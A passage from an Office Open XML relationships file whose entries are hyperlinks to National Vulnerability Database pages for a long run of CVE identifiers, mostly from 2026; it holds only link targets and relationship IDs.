Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84715" TargetMode="External" Id="rId1284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84732" TargetMode="External" Id="rId1285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85147" TargetMode="External" Id="rId1286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85155" TargetMode="External" Id="rId1287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85169" TargetMode="External" Id="rId1288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85174" TargetMode="External" Id="rId1289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85175" TargetMode="External" Id="rId1290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85180" TargetMode="External" Id="rId1291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85212" TargetMode="External" Id="rId1292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85429" TargetMode="External" Id="rId1293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85431" TargetMode="External" Id="rId1294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85436" TargetMode="External" Id="rId1295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85441" TargetMode="External" Id="rId1296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85442" TargetMode="External" Id="rId1297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85443" TargetMode="External" Id="rId1298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85444" TargetMode="External" Id="rId1299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85445" TargetMode="External" Id="rId1300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85446" TargetMode="External" Id="rId1301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85447" TargetMode="External" Id="rId1302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85448" TargetMode="External" Id="rId1303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85449" TargetMode="External" Id="rId1304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85450" TargetMode="External" Id="rId1305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85452" TargetMode="External" Id="rId1306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85540" TargetMode="External" Id="rId1307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85581" TargetMode="External" Id="rId1308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85584" TargetMode="External" Id="rId1309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85585" TargetMode="External" Id="rId1310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85604" TargetMode="External" Id="rId1311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85607" TargetMode="External" Id="rId1312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85608" TargetMode="External" Id="rId1313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85610" TargetMode="External" Id="rId1314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85612" TargetMode="External" Id="rId1315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85617" TargetMode="External" Id="rId1316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85623" TargetMode="External" Id="rId1317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85626" TargetMode="External" Id="rId1318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85664" TargetMode="External" Id="rId1319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85686" TargetMode="External" Id="rId1320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85687" TargetMode="External" Id="rId1321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85691" TargetMode="External" Id="rId1322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85699" TargetMode="External" Id="rId1323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85786" TargetMode="External" Id="rId1324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86075" TargetMode="External" Id="rId1325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86076" TargetMode="External" Id="rId1326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86169" TargetMode="External" Id="rId1327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86173" TargetMode="External" Id="rId1328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86177" TargetMode="External" Id="rId1329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86193" TargetMode="External" Id="rId1330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86195" TargetMode="External" Id="rId1331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86196" TargetMode="External" Id="rId1332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86199" TargetMode="External" Id="rId1333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86201" TargetMode="External" Id="rId1334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86250" TargetMode="External" Id="rId1335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86427" TargetMode="External" Id="rId1336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86428" TargetMode="External" Id="rId1337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86429" TargetMode="External" Id="rId1338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86430" TargetMode="External" Id="rId1339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86433" TargetMode="External" Id="rId1340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86434" TargetMode="External" Id="rId1341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86435" TargetMode="External" Id="rId1342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86439" TargetMode="External" Id="rId1343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86452" TargetMode="External" Id="rId1344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86538" TargetMode="External" Id="rId1345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86721" TargetMode="External" Id="rId1346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86727" TargetMode="External" Id="rId1347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86728" TargetMode="External" Id="rId1348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86730" TargetMode="External" Id="rId1349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86732" TargetMode="External" Id="rId1350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87807" TargetMode="External" Id="rId1351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87808" TargetMode="External" Id="rId1352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87816" TargetMode="External" Id="rId1353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87817" TargetMode="External" Id="rId1354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87819" TargetMode="External" Id="rId1355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87822" TargetMode="External" Id="rId1356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87824" TargetMode="External" Id="rId1357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87962" TargetMode="External" Id="rId1358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87995" TargetMode="External" Id="rId1359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88260" TargetMode="External" Id="rId1360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88861" TargetMode="External" Id="rId1361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88862" TargetMode="External" Id="rId1362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88874" TargetMode="External" Id="rId1363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88876" TargetMode="External" Id="rId1364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88893" TargetMode="External" Id="rId1365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88939" TargetMode="External" Id="rId1366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88959" TargetMode="External" Id="rId1367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89146" TargetMode="External" Id="rId1368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89147" TargetMode="External" Id="rId1369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89174" TargetMode="External" Id="rId1370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89176" TargetMode="External" Id="rId1371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89177" TargetMode="External" Id="rId1372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89178" TargetMode="External" Id="rId1373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89250" TargetMode="External" Id="rId1374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-35585" TargetMode="External" Id="rId1375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61732" TargetMode="External" Id="rId1376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10754" TargetMode="External" Id="rId1377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14962" TargetMode="External" Id="rId1378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19233" TargetMode="External" Id="rId1379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21087" TargetMode="External" Id="rId1380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25990" TargetMode="External" Id="rId1381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26212" TargetMode="External" Id="rId1382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34223" TargetMode="External" Id="rId1383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34741" TargetMode="External" Id="rId1384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4129" TargetMode="External" Id="rId1385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44492" TargetMode="External" Id="rId1386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45293" TargetMode="External" Id="rId1387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47194" TargetMode="External" Id="rId1388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47664" TargetMode="External" Id="rId1389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47727" TargetMode="External" Id="rId1390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48007" TargetMode="External" Id="rId1391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48120" TargetMode="External" Id="rId1392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49310" TargetMode="External" Id="rId1393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49864" TargetMode="External" Id="rId1394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50553" TargetMode="External" Id="rId1395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52776" TargetMode="External" Id="rId1396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52854" TargetMode="External" Id="rId1397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53455" TargetMode="External" Id="rId1398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53783" TargetMode="External" Id="rId1399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54511" TargetMode="External" Id="rId1400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54603" TargetMode="External" Id="rId1401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54650" TargetMode="External" Id="rId1402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54730" TargetMode="External" Id="rId1403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55182" TargetMode="External" Id="rId1404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55534" TargetMode="External" Id="rId1405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55539" TargetMode="External" Id="rId1406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55557" TargetMode="External" Id="rId1407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55580" TargetMode="External" Id="rId1408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55848" TargetMode="External" Id="rId1409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56703" TargetMode="External" Id="rId1410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56711" TargetMode="External" Id="rId1411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58014" TargetMode="External" Id="rId1412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61517" TargetMode="External" Id="rId1413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61523" TargetMode="External" Id="rId1414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61524" TargetMode="External" Id="rId1415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63219" TargetMode="External" Id="rId1416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63637" TargetMode="External" Id="rId1417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64199" TargetMode="External" Id="rId1418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66420" TargetMode="External" Id="rId1419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67328" TargetMode="External" Id="rId1420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67340" TargetMode="External" Id="rId1421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67608" TargetMode="External" Id="rId1422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67610" TargetMode="External" Id="rId1423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68581" TargetMode="External" Id="rId1424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71309" TargetMode="External" Id="rId1425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71504" TargetMode="External" Id="rId1426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71963" TargetMode="External" Id="rId1427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72001" TargetMode="External" Id="rId1428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72741" TargetMode="External" Id="rId1429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73078" TargetMode="External" Id="rId1430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73247" TargetMode="External" Id="rId1431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73612" TargetMode="External" Id="rId1432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73670" TargetMode="External" Id="rId1433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73694" TargetMode="External" Id="rId1434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73698" TargetMode="External" Id="rId1435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73699" TargetMode="External" Id="rId1436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74239" TargetMode="External" Id="rId1437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75121" TargetMode="External" Id="rId1438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75122" TargetMode="External" Id="rId1439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75123" TargetMode="External" Id="rId1440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75829" TargetMode="External" Id="rId1441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75833" TargetMode="External" Id="rId1442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75990" TargetMode="External" Id="rId1443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75991" TargetMode="External" Id="rId1444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76190" TargetMode="External" Id="rId1445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76199" TargetMode="External" Id="rId1446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77109" TargetMode="External" Id="rId1447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77774" 